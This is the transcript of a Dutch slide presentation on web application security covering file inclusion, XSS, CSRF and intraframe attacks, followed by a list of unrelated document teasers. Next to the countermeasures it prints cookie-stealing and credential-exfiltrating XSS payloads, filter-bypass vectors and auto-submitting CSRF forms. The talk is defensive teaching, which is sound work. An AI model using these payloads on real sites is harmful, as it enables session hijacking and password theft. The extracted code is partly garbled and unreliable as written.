Webapplication Security
|
|
- Victor Claes
- 8 jaren geleden
- Aantal bezoeken:
Transcriptie
1 Webapplication Security
2 Over mijzelf 7 jaar in websecurity Oprichter van VirtuaX security Cfr. Bugtraq Recente hacks hak5.org wina.ugent.be vtk.ugent.be...
3 Aantal vulnerable websites
4
5 Types vulnerable websites
6 Hoe komt dit? Veel amateur-coders Geen basis/idee van security Beveiligen = moeilijk Hacken = gemakelijk
7 Deel 1: File Inclusions
8 File Inclusions 1. Remote file inclusion Includen van externe bestanden Draaien shell! 2. Local file inclusion Includen van lokale bestanden Lekken van gevoelige gegevens Source code disclosure
9 Normale situatie SERVER FILE SCRIPT CLIENT
10 Remote File Inclusion SERVER FILE EVIL FILE SCRIPT HACKER
11 Onveilige script index.php?p=bleh.txt <?php... include($_get['p']);...?> Output: inhoud van bleh.txt
12 Voorbeeld Remote File Inclusion
13 Local File Inclusion SERVER FILE SENSITIVE FILE SCRIPT HACKER
14 Onveilige script index.php?p=bleh.txt <?php... include($_get['p']);...?> Output: inhoud van bleh.txt
15 Voorbeeld Local File Inclusion
16 Oplossing <?php switch($_get['p']) {?> } case bleh include('bleh.txt');... default: echo Are you hacking? :
17 Conclusie file inclusions php.ini configureren Input niet vertrouwen Input niet rechtstreeks in functie steken
18 Einde File Inclusion Vragen?
19 Denken zoals een hacker... Must own noob..
20 Typische authenticatie Admin PASWOORD COOKIE Server User lvl: NOBODY Admin COOKIE + DATA DATA Server User lvl: ADMIN
21 Hoe admin worden? Paswoord bemachtigen >> File inclusion << >> SQL injections << Paswoord veranderen >> XSRF << Cookie bemachtigen >> XSS <<
22 Deel 2: XSS
23 XSS Admin PASWOORD Server User lvl: NOBODY Admin + DATA DATA Server User lvl: ADMIN
24 XSS Cross Site Scripting Cookie setting Admin bezoekt Admin krijgt Cookie stealing Admin bezoekt <script> gestolen Session riding Hacker gebruikt
25 Hoe exploiten? (3) Admin PASWOORD User lvl: NOBODY Admin + DATA DATA <script> User lvl: ADMIN Hacker + DATA DATA Server User lvl: ADMIN
26 Onveilige script index.php?cat=immo <?php... echo Categorie.$_GET['cat'];...?> Output: Categorie: Immo
27 Hoe exploiten? Input Vector zoeken vb: index.php?cat= <script> document.location= +document.cookie; </script> Output: Categorie:<script>... </script>
28 Hoe exploiten? (2) Input Vector als ' disabled (PHP5): <script> document.location= String.fromCharCode(..,..,..)+ document.cookie; </script>
29 Voorbeeld XSS (1)
30 Countermeasures (1) <?php... $categorie = str_replace( <script>,,_get['cat']); echo Categorie:.$categorie;...?> NIET VEILIG
31 Voorbeeld XSS (2)
32 Countermeasures (2) <?php... $categorie =?> htmlentities($_get['cat']); echo Categorie:.$categorie;... VEILIG
33 Voorbeeld XSS (3)
34 <script> plaatsing Non persistent Niet opgeslagen (tijdelijk in URL) Zie vorige vb Persistent Script definitief op server zetten vb. Guestbook, Forum, Profiel... vb. boudewijn.ugent.be
35 All input is evil Niet altijd in tekst-variabelen Internet Explorer: bug van 1995 NOG niet opgelost Content-type wordt genegeerd IE bepaalt zelf content-type
36 IE Content-type exploit HTML/JavaScript-code uploaden Content-type aanpassen Bestand laden in IE PERSISTENT
37 Voorbeeld XSS (4)
38 Countermeasures (2) <?php... $file =...; $handle = finfo_open(fileinfo_mime); $mime_type = finfo_file($handle,$file); if($mime_type!= image/jpeg ) { exit( Hacking attempt detected. ); }...?> VEILIG
39 Verder mogelijkheden (1) Client geposte informatie laten doorsturen naar hacker <form action="login.php" method="post" onsubmit=" hackimg=new Image; hackimg.src=' +document.forms(1).login.value +':' +document.forms(1).password.value; "> </form>
40 Verder mogelijkheden (2) Client andere sites laten aanvallen /hello.php?name= <iframe src= > </iframe> = Ideale proxy voor hacker
41 Verdere mogelijkheden (3) Andere Input Vectors: <img src='javascript:alert();'> <img src='vbscript:msgbox();'> <SCRIPT SRC=locatie/xss.js /> <SCR\0IPT>alert("XSS")</SCR\0IPT> <TAG onload='javascript:alert();'> cfr:
42 Enkele limitaties Eenmalig, aanval móet lukken Sessions kunnen eindigen JavaScript/ActionScript enabled? Soms IE/... vereist
43 Conclusie vs XSS htmlentities() e.d. gebruiken Content/Mime-type controleren All input is evil!
44 Einde XSS Vragen?
45 Deel 3: XSRF
46 XSRF Cross Site Request Forgery Valt onder hotlinking attacks Cross-domain linken Gevaar herkent sinds begin '90 Fout komt in veel technologieën voor The hidden enemy Moeilijk te herkennen Moeilijk te beveiligen
47 XSRF Cross Site Request Forgery Zoeken naar vuln pagina UPDATE DB pagina Request Forgery Admin bezoekt onveilige script Paswoord/ verandert
48 Typische profielpagina Admin DATA + DATA Server User lvl: ADMIN UPDATE DATA DB
49 profiel.php <form action= bleh.php > <input type=text name=username/> <input type=text name=paswoord/> <input type=text name= /> </form>
50 Idee (1) <form action= > <input type=text name=username value=admin /> <input type=text name=paswoord value=hacked /> <input type=text name= value=blah/> </form> GEEN SESSION-ID
51 Idee (2) Admin naar onze pagina laten gaan Admin heeft immers session-id Form automatisch laten verzenden JavaScript form.submit();
52 Idee (2) code <form action= id= frm > <input...> <input...> </form> <script> document.getelementbyid( frm ).submit(); </script>
53 Voorbeeld XSRF
54 XSS + XSRF = krachtig Password managers Vullen automatisch paswoord in Als er XSS is, <script> insteken Doel: actie form veranderen Doel2: form verzenden
55 Voorbeeld-code login.php?cat= <script> var a = document.getelemenbyid( frm ); a.action= ; settimeout(a.submit(),500); </script> Output: Pagina verstuurd wachtwoord naar
56 Countermeasures vs XSRF Referer checken $_GET['referer'] Counter: XSS + XSRF vinden Oud paswoord vragen voor elke UPDATE
57 Einde XSRF Vragen?
58 Deel 4: Geavanceerdere technieken
59 IntraFrame attacks XSS is niet beperkt tot één pagina DOM-security model zegt: <script> mag enkel informatie op zelfde host lezen/aanpassen <script> heeft volledige controle over pagina's geladen in frames ZOLANG document.domain geldig is
60 IntraFrame attacks VICTIM BROWSER <script>... </script> <iframe src= evil.be/script.php... > <img src= evil.be/script.php... > SERVER HACKER <iframe> sensitive document op server VULNERABLE SERVER
61 IntraFrame attacks Combineren van aanvallen Meerdere submits() mogelijk vb: XSRF, veranderen Paswoord requesten Evil actie uitvoeren Reageren op gekregen informatie mogelijk via bvb. Ajax Mogelijk om logger te maken
62 IntraFrame sploiter VICTIM BROWSER <script>... </script> <iframe src= evil.be/script.php... > <img src= evil.be/script.php... > SERVER HACKER <iframe> sensitive document op server VULNERABLE SERVER
63 Voorbeeld IntraFrame attack (1)
64 IntraFrame logger VICTIM BROWSER <script>... </script> <iframe src= evil.be/script.php... > <img src= evil.be/script.php... > SERVER HACKER <iframe> modified document VULNERABLE SERVER
65 Voorbeeld IntraFrame attack (2)
66 Einde geavanceerde technieken Vragen?
67 Slot Verdere vragen?
Je website (nog beter) beveiligen met HTTP-Security Headers
Je website (nog beter) beveiligen met HTTP-Security Headers Wat is HTTP? Het HTTP (Hypertext Transfer Protocol) protocol is een vrij eenvoudig, tekst gebaseerd, protocol. Dit HTTP protocol regelt de communicatie
Nadere informatieWEBSECURITY INFORMATICA STUDENTENWERKING. Gemaakt door Bryan De Houwer en Yuri Moens
WEBSECURITY INFORMATICA STUDENTENWERKING Gemaakt door Bryan De Houwer en Yuri Moens ISW Informatica studentenwerking voor en door studenten Wat bieden wij aan: Workshops Shell accounts Altijd bereikbaar
Nadere informatieWeb Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop
Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop 1 Agenda Injection Cross Site Scripting Session Hijacking Cross Site Request Forgery #1 OWASP #2 top 10 #3 #5 Bezoek www.owasp.org
Nadere informatieVerslag Informatiebeveiliging
Verslag Informatiebeveiliging Onderwerp: Cross Site Scripting Auteurs: Marijn marijn at net-force.nl Tha Potterrr Website: http://www.net-force.nl Versie: Versie: 1.1 Datum: 2004-10-14 Inhoudsopgave 1.0
Nadere informatieLes 9: formulier controle met javascript.
Les 9: formulier controle met javascript. Javascript is erg veel gebruikt bij internet toepassingen. In tegenstelling tot PHP, wat een server side scripting is, is java client side scripting. Dwz, niet
Nadere informatieFoutcontrole met Javascript
Foutcontrole met Javascript Pol Van Dingenen Yannick Van Hauwe INLEIDING Het controleren van de gegevens die ingevuld zijn in formulieren is heel erg belangrijk. In de praktijk is enkel en alleen controle
Nadere informatieSecurity Pentest. 18 Januari 2016. Uitgevoerde Test(s): 1. Blackbox Security Pentest 2. Greybox Security Pentest
DEMO PENTEST VOOR EDUCATIEVE DOELEINDE. HET GAAT HIER OM EEN FICTIEF BEDRIJF. 'Inet Veilingen' Security Pentest 18 Januari 2016 Uitgevoerde Test(s): 1. Blackbox Security Pentest 2. Greybox Security Pentest
Nadere informatieJoomla & Security. Ing. Gertjan Oude Lohuis Byte Internet 19 november 2007
Joomla & Security Ing. Gertjan Oude Lohuis Byte Internet 19 november 2007 2 Over mij Gertjan Oude Lohuis Studie: informatica Platformontwikkelaar/beheerder bij Byte. Uit rol van beheerder, maar ook uit
Nadere informatieDynamische Websites. Week 2
Dynamische Websites Week 2 AGENDA Labo 1 GET, POST Navigatie, etc Varia 1 2
Nadere informatieSLA level Iron Bronze Silver Gold Platinum
Prijs 95,- per jaar 195,- per jaar 395,- per jaar 995,- per jaar 2495,- per jaar Alleen geschikt voor zeer kleine sites waar geen tot bijna geen nieuwe informatie wordt toegevoegd Geschikt voor sites van
Nadere informatieDynamische Websites. Week 3. donderdag 3 oktober 13
Dynamische Websites Week 3 AGENDA Herhaling Cookies Sessions voorbeeld.php Zuiver PHP: initialisatie variabelen instructies HTML minimum PHP nooit HTML in PHP FORM URL HTTP Methode Parameters Verstuurt
Nadere informatieTestnet Presentatie Websecurity Testen "Hack Me, Test Me" 1
Testnet Voorjaarsevenement 05 April 2006 Hack Me, Test Me Websecurity test onmisbaar voor testanalist en testmanager Edwin van Vliet Yacht Test Expertise Center Hack me, Test me Websecurity test, onmisbaar
Nadere informatieIntroductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering
Browser security Wouter van Dongen RP1 Project OS3 System and Network Engineering Februari 4, 2009 1 Introductie Onderzoeksvraag Situatie van de meest populaire browsers Client-side browser assets vs.
Nadere informatieideal Betaal Formulier (Ondersteund o.a. ideal, MisterCash, Direct E-Banking en Credit Card)
Script: Versie: 0.5 Licentie: ideal Betaal Formulier (Ondersteund o.a. ideal, MisterCash, Direct E-Banking en Credit Card) Gratis te gebruiken door (erkende) goede doelen. 200,00 excl. BTW voor aanschaf
Nadere informatieHANDLEIDING WERKEN OP AFSTAND
HANDLEIDING WERKEN OP AFSTAND ASP4all Hosting B.V. Energieweg 8 1271 ED Huizen Augustus 2009 Versie 1.0 Copyright 2009, ASP4all Hosting B.V. Niets uit deze uitgave mag worden vermenigvuldigd en/of op andere
Nadere informatieOpmerkingen kan je mailen naar: A. Kouters: A. Steijlen: Versie Datum Opmerkingen
Deze handleiding is met de nodige zorg samengesteld. Het kan echter voorkomen dat sommige zaken niet goed of onduidelijk zijn beschreven. Mocht je iets tegenkomen wat niet of slecht is beschreven horen
Nadere informatieResultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities
De Nessus scan We hebben ervoor gekozen om de webserver met behulp van Nessus uitvoerig te testen. We hebben Nessus op de testserver laten draaien, maar deze server komt grotendeels overeen met de productieserver.
Nadere informatieFormulieren maken met Dreamweaver CS 4/CS 5
Formulieren maken met Dreamweaver CS 4/CS 5 In deze handleiding leer je om een formulier en elementen die je binnen een formulier kunt gebruiken, te ontwerpen met Dreamweaver. Het uitgangspunt is dat dit
Nadere informatieServer Side Scripting
Server Side Scripting Formulieren & beveiliging Vakopzet C 1 2 3 4 5 6 7 8 9 WC TOETS Lessen Lesweek 1 (47) Vakoverzicht en introductie Lesweek 2 (48) Doornemen Ch3 (40p) Lesweek 3 (49) Deeltoets 1, Doornemen
Nadere informatie9. MYSQL. Daarin zien we het administratie paneel van mysql.
9. MYSQL We kunnen ook in dit systeem gebruik maken van de gekende ACCESS databanken. Zolang het maar relationale databanjken zijn kunnen we er gebruik van maken. In PHP echter maakt men meestal gebruik
Nadere informatiePHP & MySQL. Studievaardigheden 2013. Frank Takes (ftakes@liacs.nl) LIACS, Universiteit Leiden
PHP & MySQL Studievaardigheden 2013 Frank Takes (ftakes@liacs.nl) LIACS, Universiteit Leiden Inleiding Voorkennis: geen Stof: dit college, www.w3schools.com en www.php.net Opdracht: maak een uitgebreide*
Nadere informatiePHP & MySQL. Studievaardigheden 2014. Jan van Rijn (j.n.van.rijn@liacs.leidenuniv.nl) LIACS, Universiteit Leiden
PHP & MySQL Studievaardigheden 2014 Jan van Rijn (j.n.van.rijn@liacs.leidenuniv.nl) LIACS, Universiteit Leiden Inleiding Voorkennis: geen Stof: dit college, www.w3schools.com en www.php.net Opdracht: maak
Nadere informatieBack to the Future. Marinus Kuivenhoven Sogeti
Back to the Future Marinus Kuivenhoven Sogeti 1 Commodore 64 2 Commodore 1541 floppy drive 3 Assymetrisch gedrag Een operatie die voor een overgang zorgt.. Waarbij heen minder kost dan terug 4 Assymetrisch
Nadere informatieVoor vragen: http://www.richard3332.nl/ of mail naar Richard3332@gmail.com
Welkom bij mijn website tutorial (Deel 7) Ik ga uit van Microsoft XP voor de duidelijkheid. Ik heb dus geen idee of de programma s die ik gebruik ook op Vista werken. Notepad++ werkt zowieso op xp en Vista.
Nadere informatieHTML. Formulieren. Hans Roeyen V 3.0
Formulieren Hans Roeyen V 3.0 26 februari 2015 Inhoud 1. Formulieren... 3 1.1. De form tag... 3 1.1.1. Het action attribute... 4 1.1.2. Het method attribute... 4 1.2. De input tag... 4 1.3. Soorten input
Nadere informatieDeny nothing. Doubt everything.
Deny nothing. Doubt everything. Hack to the Future Marinus Kuivenhoven Sr. Security Specialist Houten, 23 juni 2015 marinus.kuivenhoven@sogeti.com 2 Het valt op Wij leren niet van het verleden Zekerheid
Nadere informatieWelkom-tab op facebookpagina
Welkom-tab op facebookpagina Iemand komt op uw facebookpagina. Natuurlijk wil u die persoon duidelijk laten zien waar de pagina over gaat. En om die persoon regelmatig terug te zien, kan u hem aanraden
Nadere informatieFormulieren en waarden posten naar een view
Hoofdstuk 4 Formulieren en waarden posten naar een view Waarden posten naar een view in een Zend-project gaat heel anders dan dat je gewend bent. Om dit mechanisme te leren, kunnen we het beste een eenvoudige
Nadere informatieDeny nothing. Doubt everything.
Deny nothing. Doubt everything. Testen van IoT Security Marinus Kuivenhoven Sr. Security Specialist Vianen, 11 juli 2016 Testen van IoT Security 2 Casio AT-550 Testen van IoT Security 3 LG GD910 Testen
Nadere informatieZest Application Professionals Training &Workshops
Het in kaart krijgen van kwetsbaarheden in Websites & Applicaties en hoe deze eenvoudig te voorkomen zijn, wordt in Applicatie Assessments aangetoond en in een praktische Workshop behandelt. U doet hands-on
Nadere informatieProware Cloud Webbuilder Versie 2.30
Proware Cloud Webbuilder Versie 2.30 Laatste update: 02-12-2013 Inhoudsopgave Het principe van open login... 3 Functie- en procedurebeschrijving... 5 Loginfunctie... 5 Bevestigingsfunctie... 5 Demobestanden...
Nadere informatieWhat is the advantage of using expression language instead of JSP scriptlets and JSP expressions?
Web 3: Theorievragen No Scriptlets What is the advantage of using expression language instead of JSP scriptlets and JSP expressions? Geen javacode tussen de html. What is the difference between the. operator
Nadere informatieWeb building gevorderden: CSS & JavaScript. Karel Nijs 2008/11
Web building gevorderden: CSS & JavaScript Karel Nijs 2008/11 Webbuilding gevorderden les 3 JavaScript intro JavaScript invoegen JavaScript statements JavaScript popup berichten JavaScript functies JavaScript
Nadere informatieThird party mededeling
Third party mededeling Vertrouwelijk Klant AFAS Product AFAS Insite Versie 1.0 Auteur David van der Sluis Datum 26 juni 2017 1. Introductie Op verzoek van AFAS verstrekt Computest hierbij een Third Party
Nadere informatieHandleiding plaatsen van Banners
Handleiding plaatsen van Banners In deze handleiding leggen wij uit hoe een banners en tekstlinks naar www.wijnaccent.nl kunt plaatsen op jouw website. Wij adviseren om deze handleiding goed door te lezen.
Nadere informatiePlan van aanpak. 1 Inleiding. 2 Onderzoek. 3 Taken. Kwaliteitswaarborging van webapplicaties. Rachid Ben Moussa
Plan van aanpak Rachid Ben Moussa Kwaliteitswaarborging van webapplicaties 1 Inleiding De meeste zwakheden in software worden veroorzaakt door een klein aantal programmeerfouten. Door het identificeren
Nadere informatieInstallatie Handleiding - Multispectraal V.W1.0
Installatie Handleiding - Multispectraal V.W1.0 Inhoudsopgave Hoofdstuk Pagina Nr. 1. Download 3 2. Database 3 2. WWW 4 2. Verifinger 5 2. Script 6 Download Voorafgaand aan de installatie moet u een aantal
Nadere informatieHTTPS. HTTP over SLL Publieke sleutel certificaat Getekend door betrouwbare bron In transport laag
Security HTTPS HTTP over SLL Publieke sleutel certificaat Getekend door betrouwbare bron In transport laag Vereisten JEE: applicatie laag Data integriteit Confidentialiteit Non-repudiation Quality-of-service
Nadere informatieSecurity web services
Security web services Inleiding Tegenwoordig zijn er allerlei applicaties te benaderen via het internet. Voor bedrijven zorgt dit dat zei de klanten snel kunnen benaderen en aanpassingen voor iedereen
Nadere informatieESET Anti-Ransomware Setup
ESET Anti-Ransomware Setup Meerlaagse beveiliging tegen versleuteling Document version: 1.1 Authors: Michael van der Vaart, Chief Technology Officer Donny Maasland, Head of Cybersecurity Services and Research
Nadere informatieWebsitecursus deel 3 JavaScript
Websitecursus deel 3 JavaScript A Eskwadraat WebCie www@a-eskwadraat.nl 12 oktober 2015 Introductie Twee weken geleden HTML Vorige week CSS Deze week JavaScript Javascript JavaScript (ook wel JS) is een
Nadere informatiePhotoworkZ pop-up website handleiding
PhotoworkZ pop-up website handleiding Inhoudsopgave PhotoworkZ pop-up website handleiding...1 Aanmelden op de admin module...2 Beheer van teksten...3 Tekst downloaden en aanpassen...3 Aanpassen van teksten...4
Nadere informatie5 Hackaanvallen die uw webwinkel bedreigen. Hans Bouman B2U
5 Hackaanvallen die uw webwinkel bedreigen Hans Bouman B2U Business to You H a n s B o u m a n 1992 2000 Projectleader SET Productmanager e Commerce 2001 e Payment consultant Veenweg 158 B 3641 SM MIJDRECHT
Nadere informatieGetting Started. AOX-319 PBX Versie 2.0
Getting Started AOX-319 PBX Versie 2.0 Inhoudsopgave INHOUDSOPGAVE... 2 OVER DEZE HANDLEIDING... 3 ONDERDELEN... 3 INSTALLATIE EN ACTIVERING... 3 BEHEER VIA DE BROWSER... 4 BEHEER VIA DE CONSOLE... 5 BEVEILIGING...
Nadere informatieNedap healthcare OnsDB: Certificaataanvraag, selectie van gegevens (parameters) en gebruik
OnsDB: Certificaataanvraag, Voordat OnsDB voor de eerste keer op een computer gebruikt kan worden is het nodig om door Nedap een certificaat te laten goedkeuren. Het certificaat wordt aangevraagd door
Nadere informatieUNIX FAQ. Migratie naar een nieuwe server
UNIX FAQ Migratie naar een nieuwe server Shared Hosting Unix FAQ v5 NL 28032006 Pagina 1/13 Inhoudstafel 1. Inleiding...3 2. Inloggen...3 3. Register_globals in PHP...4 3.1 Wat is de optie register_globals
Nadere informatieFormulier maken en opvangen met php
Welkom bij mijn PHP tutorial (Deel 2) Ik ga in deze delen PHP uitleggen, dit doe ik in het programma notepad++ (gratis) deze kunt u downloaden van www.richard3332.nl/downloads.php Als u beschikt over dreamweaver
Nadere informatieDomein API Handleiding
Domein API Handleiding Versie 1.6 Datum: 16-07-2014 1 Inhouds opgave 2 Inleiding 3 Result codes 4 Api functies 5 Api helpers 2 Inleiding: De API van 123 Hosting Service kan worden gebruikt om te registreren
Nadere informatiePrivacy policy Spankracht Ontwerpers. Versie 1.0
Privacy policy Spankracht Ontwerpers Versie 1.0 Deze pagina is voor het laatst aangepast op 17-05-2018. Wij zijn er van bewust dat u vertrouwen stelt in ons. Wij zien het dan ook als onze verantwoordelijkheid
Nadere informatieSiteSafe. Rapportage. Security Audit voor CFConsultancy
SiteSafe Rapportage Security Audit voor CFConsultancy Rapport Basic Security Audit Plus voor CFConsultancy Introductie... 2 Algemene indruk... 3 Constateringen... 4 Conclusie... 5 Bijlage A: Security Checklist...
Nadere informatieVKblog-importer : De gebruiksaanwijzing.
VKblog-importer : De gebruiksaanwijzing. deze gebruiksaanwijzing beschrijft versie 0.1.2 VKblog-importer is een plugin voor WordPress die bedoeld is om blogs van VKblog te importeren in WordPress. Posts
Nadere informatieKatholieke Hogeschool Kempen ASP
Katholieke Hogeschool Kempen Campus Geel Departement Handelswetenschappen en Bedrijfskunde 3de jaar Toegepaste Informatica ASP www.projectchatroom.be Yorkim Parmentier 3TI4 Andy Geluykens 3TI4 Academiejaar
Nadere informatieDoor onze website te gebruiken gaat u akkoord met het gebruik van cookies zoals beschreven in dit cookiebeleid.
3V cookiebeleid. Een cookie is een klein tekstbestand dat naar uw internetbrowser wordt gestuurd. Voorbeelden van internetbrowsers zijn Internet Explorer, Safari, Google Chrome en Mozilla. De cookie wordt
Nadere informatieESET Anti-Ransomware Setup
ESET Anti-Ransomware Setup Meerlaagse beveiliging tegen versleuteling Document version: 1.0 Authors: Michael van der Vaart, Chief Technology Officer Donny Maasland, Head of Cybersecurity Services and Research
Nadere informatiePuntjes op de I. Baris Firat
Puntjes op de I Baris Firat 1 Functies en kritieke onderdelen in code (onderdelen die niet in één oogopslag te verklaren zijn) zijn voorzien van comments. Hierbij wordt er gebruikt gemaakt van geldende
Nadere informatieVPN Remote Dial In User. Windows VPN Client
VPN Remote Dial In User Windows VPN Client VPN Remote Dial In User Met een Virtual Private Network (VPN) is het mogelijk om door middel van een beveiligde(geautoriseerd en/of versleuteld) verbinding te
Nadere informatieINFORMATIEBEVEILIGING VOOR WEBWINKELS
INFORMATIEBEVEILIGING VOOR WEBWINKELS HANDIGE CHECKLISTS In deze whitepaper bieden we u tips en checklists die kunnen bijdragen aan een optimale beveiliging van zowel uw eigen data als die van uw klanten.
Nadere informatieCookies SmartshopXL. Cookies zijn kleine tekstbestanden die door websites kunnen worden gebruikt om gebruikerservaringen efficiënter te maken.
Cookies SmartshopXL Cookies zijn kleine tekstbestanden die door websites kunnen worden gebruikt om gebruikerservaringen efficiënter te maken. Volgens de wet mogen wij cookies op uw apparaat opslaan als
Nadere informatieCookies SmartshopXL. Cookies zijn kleine tekstbestanden die door websites kunnen worden gebruikt om gebruikerservaringen efficiënter te maken.
Cookies SmartshopXL Cookies zijn kleine tekstbestanden die door websites kunnen worden gebruikt om gebruikerservaringen efficiënter te maken. Volgens de wet mogen wij cookies op uw apparaat opslaan als
Nadere informatieJavascript activeren. Internet Explorer 6+ file:///f:/seniorennet/oplossingen%20text/javascript_aanzetten.html. 1 van 10 2/04/2007 13:02
1 van 10 2/04/2007 13:02 Javascript activeren Onderstaand vind u de 5 meest gebruikte browsers, klikt u op de versie die u gebruikt zodat u kunt zien hoe u JavaScript aanzet. Internet Explorer 6+ Nederlandse
Nadere informatieBeschrijving functioneel en technisch design van de website
Bespreking Punten: Beschrijving functioneel en technisch design van de website Nr. Punt 1 Student 2 Bedrijf 3 Algemene lay out 4 Technologieën 5 Webruimte en datatrafiek 1. Student Registratie Bij de registratie
Nadere informatieEn nu gaan leren Brenno de Winter
Digitale Veiligheid 3.0 En nu gaan leren Brenno de Winter - @brenno brenno@dewinter.com - 0653536508 Open Data Privacy 3300 BC 200 BC 1040 Andere snelheden 1520 Boeken 1521 Luther in de ban 1546 Luther
Nadere informatieTaak 2.1.9 - Strict or Strong. Inhoud
Taak 2.1.9 - Strict or Strong Inhoud Taak 2.1.9 Strict or Strong... 1 Inhoud... 1 Inleiding... 2 Wat is een Strict wachtwoord policy?... 3 Waarom een sterk wachtwoord?... 3 De controle methode... 4 PSDs...
Nadere informatieHandleiding Thuiswerken / CSG-Site / VPN-Access
Handleiding Thuiswerken / CSG-Site / VPN-Access Plaats: Venlo Datum: 01-11-2011 Versie: 3.0 Inhoudsopgave Inhoudsopgave... 2 1. Instellingen... 3 1.1 Instellingen Internet Explorer (eenmalig)... 4 1.2
Nadere informatieConfigureren van de Wireless Breedband Router.
Configureren van de Wireless Breedband Router. 1.1 Opstarten en Inloggen Activeer uw browser en de-activeer de proxy of voeg het IP-adres van dit product toe aan de uitzonderingen. Voer vervolgens het
Nadere informatieGebruikershandleiding. Multrix Cloud Portal
Gebruikershandleiding versie: 18 maart 2013 Multrix Cloud Portal Toegang tot uw applicaties en gegevens via het internet Handleiding Multrix Cloud Portal - NED Pagina 1 van 11 Inleiding Dit document biedt
Nadere informatieVersie 0.4. Documentatie Onsweb Club plugin voor KNKV verenigingen. Laatste wijziging: 19 juli 2012 Auteurs: Marien Dongstra, Sebastian Huisman
Documentatie Onsweb Club plugin voor KNKV verenigingen Versie 0.4 Laatste wijziging: 19 juli 2012 Auteurs: Marien Dongstra, Sebastian Huisman Alle rechten in dit document zijn voorbehouden. www.onsweb.nl,
Nadere informatieCOOKIE & TRACKING INFORMATIE
COOKIE & TRACKING INFORMATIE COOKIEWETGEVING AUGUSTUS 2012 COOKIES EN TRACKING BIJ ZANOX-M4N zanox-m4n maakt gebruik van verschillende technieken om uw leads en sales te meten. Om u te helpen te voldoen
Nadere informatieWeb Security. Is echt alles kapot? SDN Event 2 September 2016
Web Security Is echt alles kapot? SDN Event 2 September 2016 Agenda Wie ben ik? Hoe staat de software- en security industrie ervoor? Wat is het probleem? Wat kunnen we er aan doen? 2 Wie ben ik? Niels
Nadere informatie15. Google Tag Manager
W H I T E P A P E R I N 5 M I N U T E N J U N I 2 0 1 5 15. Google Tag Manager Introductie Marketeers zijn dol op statistieken en big data. Hoe meer hoe beter! Google Analytics wordt hier veel voor gebruikt,
Nadere informatieCOOKIES EN TRACKING BIJ ZANOX
COOKIES EN TRACKING BIJ ZANOX zanox maakt gebruik van verschillende technieken om uw leads en sales te meten. Om u te helpen te voldoen aan de informatieverplichting van de privacy-wetgeving, bieden wij
Nadere informatieAutoTrack.nl. Handleiding Implementatie Voorraadlijst
AutoTrack.nl Handleiding Implementatie Voorraadlijst Basis Implementatie De nieuwe AutoTrack.nl Voorraadlijst kunt u (of uw webbouwer) implementeren door op uw website de URL die u van AutoTrack.nl heeft
Nadere informatieINHOUDSOPGAVE 3. 3.5 Het Boekenwinkeltje... 90 3.5.1 Registreer.aspx... 90 3.6 Opgaven... 97
Inhoudsopgave 1 Inleiding 8 1.1 Het.Net Framework................................ 8 1.1.1 Het.Net Ontwikkelingsmodel....................... 8 1.1.2 Compilatie en Uitvoering in.net.....................
Nadere informatie1.4.1 WordPress online WordPress-software Open source Forums 4
Inhoud Hoofdstuk 1 WordPress 1.1 Site bouwen 1 1.1.1 Software 1 1.1.2 CMS 1 1.2 Webdesign 1 1.3 Waarom WordPress? 2 1.3.1 CMS 2 1.3.2 WordPress 2 1.4 Wat is WordPress? 3 1.4.1 WordPress online 3 1.4.2
Nadere informatieGebruikershandleiding voor: Beperkte Password protectie met JavaScript
Gebruikershandleiding voor: Beperkte Password protectie met JavaScript URL: http://home.hccnet.nl/s.f.boukes/html-2/html-202.htm INHOUD : 1. Structuur van een beveiligde site 2. Login-formulier 3. Login
Nadere informatieSoftware Requirements Specification
Software Requirements Specification PEN: Paper Exchange Network Software Engineering groep 1 (se1-1415) Academiejaar 2014-2015 Jens Nevens - Sander Lenaerts - Nassim Versbraegen Jo De Neve - Jasper Bevernage
Nadere informatiePerceptive Process. Release Notes. Versie: 3.2.x
Perceptive Process Release Notes Versie: 3.2.x Geschreven door: Product Knowledge, R&D Datum: oktober 2014 2014 Perceptive Software. Alle rechten voorbehouden. Perceptive Software is een gedeponeerd handelsmerk
Nadere informatieTaak 2.1.3 Versleutelen en dan weer terug... 1
Taak 2.1.3 Versleutelen en dan weer terug Inhoud Taak 2.1.3 Versleutelen en dan weer terug... 1 Inhoud... 1 Inleiding... 2 Encryptie en Decryptie... 3 Symmetrisch... 3 Asymmetrisch... 3 Waarom Encryptie
Nadere informatieWaarom vraagt LinkedIn je Googlewachtwoord?
Compact_ 2009_4 17 Waarom vraagt LinkedIn je Googlewachtwoord? Pieter Ceelen MSc P. Ceelen MSc is als junior adviseur werkzaam bij KPMG IT Advisory. Hij houdt zich onder andere bezig met opdrachten op
Nadere informatieEen website maken met databasetoegang.
Hoofdstuk 5 Een website maken met databasetoegang. In dit hoofdstuk gaan we het weblog dat je in hoofdstuk 4 hebt gemaakt verder uitbreiden. Een belangrijk onderdeel wordt toegevoegd aan de applicatie,
Nadere informatieInhoudsopgave 2012S.1.0
Inhoudsopgave Activeren Efficy toolbar in Office 2007/2010... 2 Outlook 2007/2010... 2 Word/Excel 2007/2010... 4 Aangepast niveau - vertrouwde websites... 6 Compatibiliteitsweergave voor IE10... 8 Outlook
Nadere informatieVersie 6.4 ( ) Inloggen op de Thuiswerk Portal
Versie 6.4 (9-10-2017) Inloggen op de Thuiswerk Portal Inhoudsopgave Inhoudsopgave... 2 Inleiding... 3 VPN verbinding maken m.b.v. SSL VPN Agent software installatie op je thuiswerkplek... 4 (Voor inloggen
Nadere informatieWEBSITE-DESIGN CHRIS VERMAAS & FJODOR VAN SLOOTEN 2014-201000018-1B
WEBSITE-DESIGN CHRIS VERMAAS & FJODOR VAN SLOOTEN 2014-201000018-1B WEBSITE-DESIGN INHOUD COLLEGE Afronding vak JQuery, mail(formulieren) en social media Testen Website-design 5-1-2015 2 AFRONDING VAK
Nadere informatieBASISELEMENTEN <form> <input> <textarea> <select> & <option> </form> INPUT element. INPUT attributen: type, id & name
Je kan een basisformulier opzetten voor je website Je kan informatie opvragen op verschillende manieren Je kan een formulier opmaken met CSS 3 Je kan formulieren beheren in Adobe Dreamweaver GERICHT INFORMATIE
Nadere informatieFleet Pack Scan2FleetPack
